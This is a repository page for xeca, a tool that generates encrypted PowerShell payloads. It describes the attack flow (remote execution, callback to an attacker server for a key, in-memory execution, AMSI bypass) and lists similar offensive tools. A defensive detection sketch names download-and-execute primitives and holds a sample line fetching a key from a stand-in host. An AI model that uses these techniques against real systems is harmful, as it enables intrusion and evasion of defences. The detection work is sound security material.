
postrequest / xeca

Licence: GPL-3.0 license
PowerShell payload generator


Projects that are alternatives of or similar to xeca

Print My Shell
Python script written to automate the process of generating various reverse shells.
Stars: ✭ 140 (+35.92%)
Mutual labels:  penetration-testing, ctf, ctf-tools
Jwtxploiter
A tool to test security of json web token
Stars: ✭ 130 (+26.21%)
Mutual labels:  penetration-testing, ctf, ctf-tools
Lscript
The LAZY script will make your life easier, and of course faster.
Stars: ✭ 3,056 (+2866.99%)
Mutual labels:  penetration-testing, payload, payload-generator
Flask Unsign
Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys.
Stars: ✭ 90 (-12.62%)
Mutual labels:  penetration-testing, ctf, ctf-tools
Stegcracker
Steganography brute-force utility to uncover hidden data inside files
Stars: ✭ 396 (+284.47%)
Mutual labels:  penetration-testing, ctf, ctf-tools
Stegextract
Detect hidden files and text in images
Stars: ✭ 79 (-23.3%)
Mutual labels:  penetration-testing, ctf
Pentest Guide
Penetration tests guide based on OWASP including test cases, resources and examples.
Stars: ✭ 1,316 (+1177.67%)
Mutual labels:  penetration-testing, payload
Scilla
🏴‍☠️ Information Gathering tool 🏴‍☠️ DNS / Subdomains / Ports / Directories enumeration
Stars: ✭ 116 (+12.62%)
Mutual labels:  penetration-testing, ctf-tools
Ezxss
ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting.
Stars: ✭ 1,022 (+892.23%)
Mutual labels:  penetration-testing, payload
Awesome Hacking Resources
A collection of hacking / penetration testing resources to make you better!
Stars: ✭ 11,466 (+11032.04%)
Mutual labels:  penetration-testing, ctf
OSCP-Prep
Contained is all my reference material for my OSCP preparation. Designed to be a one stop shop for code, guides, command syntax, and high level strategy. One simple clone and you have access to some of the most popular tools used for pentesting.
Stars: ✭ 33 (-67.96%)
Mutual labels:  pentesting-windows, pentesting-tools
Fwdsh3ll
Forward shell generation framework
Stars: ✭ 62 (-39.81%)
Mutual labels:  penetration-testing, ctf-tools
Discover
Custom bash scripts used to automate various penetration testing tasks including recon, scanning, parsing, and creating malicious payloads and listeners with Metasploit.
Stars: ✭ 2,548 (+2373.79%)
Mutual labels:  penetration-testing, payload-generator
Awesome Hacking
A collection of various awesome lists for hackers, pentesters and security researchers
Stars: ✭ 48,038 (+46538.83%)
Mutual labels:  pentesting-windows, penetration-testing
Owasp Workshop Android Pentest
Learning Penetration Testing of Android Applications
Stars: ✭ 60 (-41.75%)
Mutual labels:  penetration-testing, ctf
Knary
A simple HTTP(S) and DNS Canary bot with Slack/Discord/MS Teams & Pushover support
Stars: ✭ 187 (+81.55%)
Mutual labels:  penetration-testing, ctf-tools
Lnkup
Generates malicious LNK file payloads for data exfiltration
Stars: ✭ 205 (+99.03%)
Mutual labels:  penetration-testing, payload
Brutal
Payload for Teensy like a Rubber Ducky but the syntax is different. This Human Interface Device (HID attacks). Penetration with Teensy. Brutal is a toolkit to quickly create various payloads, PowerShell attacks, virus attacks and launch a listener for a Human Interface Device (Payload Teensy).
Stars: ✭ 678 (+558.25%)
Mutual labels:  penetration-testing, payload
Vhostscan
A virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, work around wildcards, aliases and dynamic default pages.
Stars: ✭ 767 (+644.66%)
Mutual labels:  penetration-testing, ctf-tools
Oscp Pentest Methodologies
Various practical study materials for OSCP exam preparation / practical penetration testing materials
Stars: ✭ 166 (+61.17%)
Mutual labels:  penetration-testing, ctf

xeca

xeca is a project that creates encrypted PowerShell payloads for offensive purposes.

Creating position independent shellcode from DLL files is also possible.

Note: Please place your custom AMSI bypass in src/assets/amsi-bypass.ps1.


Install

First, ensure that Rust is installed, then build the project with the following command:

cargo build

How It Works

  1. Identify and encrypt the payload. Load the encrypted payload into a PowerShell script and save it to a file named "launch.txt"
  2. The key to decrypt the payload is saved to a file named "safe.txt"
  3. Execute "launch.txt" on a remote host
    • The script will call back to the attacker-defined web server to retrieve the decryption key "safe.txt"
    • Decrypt the payload in memory
    • Execute the intended payload in memory

Mitigations

If users must have access to programs such as powershell.exe, consider minimising security risks with Just Enough Administration and PowerShell Logging. Application control policies can be deployed via a whitelisting technology such as AppLocker.
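
A defender-side sketch of the PowerShell Logging mitigation, added here and not part of xeca: with Script Block Logging enabled, Event ID 4104 fragments are reassembled per script block and checked for the three behaviours listed under How It Works (key fetch, decryption, in-memory execution) appearing together. The token lists, function names and sample records are constructed assumptions, not signatures taken from xeca.

```python
import re
from collections import defaultdict

# Behaviour classes follow the "How It Works" steps; the token lists are
# illustrative assumptions, not signatures extracted from xeca.
BEHAVIOURS = {
    "key_fetch": re.compile(
        r"net\.webclient|downloadstring|downloaddata|invoke-webrequest|invoke-restmethod", re.I),
    "decrypt": re.compile(r"createdecryptor|security\.cryptography", re.I),
    "in_memory_exec": re.compile(
        r"invoke-expression|\biex\b|reflection\.assembly\]::load|scriptblock\]::create", re.I),
}

def reassemble(events):
    """Join 4104 fragments (MessageNumber of MessageTotal) per ScriptBlockId."""
    parts = defaultdict(dict)
    for ev in events:
        parts[ev["ScriptBlockId"]][ev["MessageNumber"]] = ev["ScriptBlockText"]
    return {sid: "".join(text for _, text in sorted(frags.items()))
            for sid, frags in parts.items()}

def classify(text):
    """Return the set of behaviour classes whose tokens appear in the text."""
    return {name for name, rx in BEHAVIOURS.items() if rx.search(text)}

def suspicious_blocks(events):
    """Return ScriptBlockIds where one script shows all three behaviours."""
    return sorted(sid for sid, text in reassemble(events).items()
                  if classify(text) == set(BEHAVIOURS))

# Constructed sample records; field names follow Event ID 4104 and the
# script text is fragmentary on purpose. Fragments arrive out of order.
SAMPLE_EVENTS = [
    {"ScriptBlockId": "aaaa-1", "MessageNumber": 2, "MessageTotal": 2,
     "ScriptBlockText": " ... .CreateDecryptor() ... ; Invoke-Expression $plain"},
    {"ScriptBlockId": "aaaa-1", "MessageNumber": 1, "MessageTotal": 2,
     "ScriptBlockText": "$k = (New-Object Net.WebClient).DownloadString('http://192.0.2.10/safe.txt');"},
    {"ScriptBlockId": "bbbb-2", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Invoke-WebRequest https://example.com/report.csv -OutFile report.csv"},
    {"ScriptBlockId": "cccc-3", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Get-ChildItem C:\\Logs | Sort-Object Length"},
]

if __name__ == "__main__":
    print(suspicious_blocks(SAMPLE_EVENTS))
```

Matching each 4104 fragment on its own would miss the first sample, because the fetch and the decrypt/execute steps land in different fragments; large embedded payloads make such splitting likely.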

Examples

Covenant

Covenant .NET assembly donut payload.

Empire

Empire PowerShell payload.

Merlin

Merlin DLL payload.

Sliver

Sliver Shellcode payload.

Acknowledgements

This tool would not be possible without the sharing of knowledge and information. Ideas, snippets and code from the following authors should be acknowledged:
@monoxgas
@H0neyBadger
@TheWover
@stephenfewer
@dismantl
@tandasat
@cobbr

License

xeca is licensed under GPLv3, some sub-components may have separate licenses. See their respective references in this project for details.
